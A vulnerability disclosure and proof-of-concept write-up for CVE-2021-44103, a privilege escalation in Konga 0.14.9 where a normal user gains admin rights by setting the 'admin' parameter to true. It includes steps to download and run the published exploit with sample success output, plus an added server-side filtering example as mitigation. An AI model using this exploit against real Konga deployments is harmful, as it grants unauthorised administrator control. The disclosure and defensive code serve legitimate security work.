## https://sploitus.com/exploit?id=A00E4CA2-764A-5006-9E88-00CDF5E0C3A9
# CVE-2021-44103
A proof of concept for KONGA 0.14.9 - Privilege Escalation.

## Intro
On November 16, 2021, Fabrício Salomão and I found a vulnerability in Konga API Gateways, allowing any authenticated user to become an administrator.

## Report Vulnerability

Product: KONGA<br/>
Model: 0.14.9<br/>
Vulnerability: Privilege Escalation<br/>
Impact: Full admin access (vertical privilege escalation)<br/>
Authentication: required<br/>
Exploit Author: [Fabricio Salomao](https://twitter.com/_SOl0m0n) / [Paulo Trindade](https://twitter.com/paulotrindadec)

## PoC

Below, a normal user called "usernormal" was created without privileges.

![Crash](/images/konga01.png)

![Crash](/images/konga02.png)

In the request below, the flag "FALSE" in the "admin" parameter was changed to "TRUE".

![Crash](/images/konga03.png)

An exploit was therefore created: https://www.exploit-db.com/exploits/50521

![Crash](/images/konga04.png)

After running the exploit, the privilege escalation was a success!

Result:

![Crash](/images/konga05.jpg)
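
The PoC works because the server accepted a client-supplied "admin" value from a non-admin user. One way to block that on the server side is shown below as an added example; it is not Konga's code, and `sanitizeUserUpdate` and every field name other than `admin` are assumptions made for illustration.

```javascript
// Added example: server-side filtering of a user-update payload.
// Hypothetical helper, not part of Konga. `actor` must be loaded from the
// server-side session or database, never from fields the client sends.

// Fields a user may change on their own account (assumed set).
const SELF_EDITABLE = new Set(['firstName', 'lastName', 'email']);
// Fields only an administrator may change. `admin` is the flag from the PoC;
// `active` is an assumed second privileged field.
const ADMIN_ONLY = new Set(['admin', 'active']);

function sanitizeUserUpdate(actor, targetId, body) {
  if (!actor || typeof body !== 'object' || body === null || Array.isArray(body)) {
    return { ok: false, status: 400, reason: 'malformed request' };
  }
  const actorIsAdmin = actor.admin === true; // strict: "TRUE" or 1 do not count
  if (!actorIsAdmin && String(actor.id) !== String(targetId)) {
    return { ok: false, status: 403, reason: 'cannot edit another user' };
  }
  const update = {};
  for (const [key, value] of Object.entries(body)) {
    if (ADMIN_ONLY.has(key)) {
      if (!actorIsAdmin) {
        // Reject instead of silently dropping, so the attempt shows up in logs.
        return { ok: false, status: 403, reason: `field "${key}" requires admin` };
      }
      if (typeof value !== 'boolean') {
        return { ok: false, status: 400, reason: `field "${key}" must be boolean` };
      }
      update[key] = value;
    } else if (SELF_EDITABLE.has(key)) {
      update[key] = value;
    } else {
      // Allowlist only: unknown keys (including "__proto__") are refused.
      return { ok: false, status: 400, reason: `unknown field "${key}"` };
    }
  }
  return { ok: true, update };
}

// Constructed sample actors and requests.
const normalUser = { id: 10, admin: false };
const adminUser = { id: 1, admin: true };
console.log(sanitizeUserUpdate(normalUser, 10, { admin: true }));
console.log(sanitizeUserUpdate(normalUser, 10, { email: 'u@example.com' }));
console.log(sanitizeUserUpdate(adminUser, 10, { admin: true }));
```

Only the returned `update` object should ever reach the database layer; the raw request body should not.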

## Running the exploit

```
wget https://www.exploit-db.com/raw/50521 -O 50521.py

Edit 50521.py

Modify:

urlkonga = "http://www.example.com:1337/" # change to your konga address
identifier = "usernormalkonga"            # change user
password = "changeme"                     # change password

Execute:

python 50521.py

[+] Attack
[+] Token eyJhbGciOiJIUzI1NiJ9.MTA.JFmJ0Vd3z5oeOTokSL0qfPZSOJmnZKEjZVzCJs_AM-U
[+] Change Normal User to Admin
[+] Success
```

## LINKS

http://n0hat.blogspot.com/2021/11/konga-0149-privilege-escalation-exploit.html

https://www.exploit-db.com/exploits/50521

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44103

https://github.com/advisories/GHSA-f2mp-8fgg-7465

https://security.snyk.io/vuln/SNYK-JS-KONGA-2434821

https://twitter.com/CVEnew/status/1508455166885961732

https://twitter.com/search?q=CVE-2021-44103&src=typed_query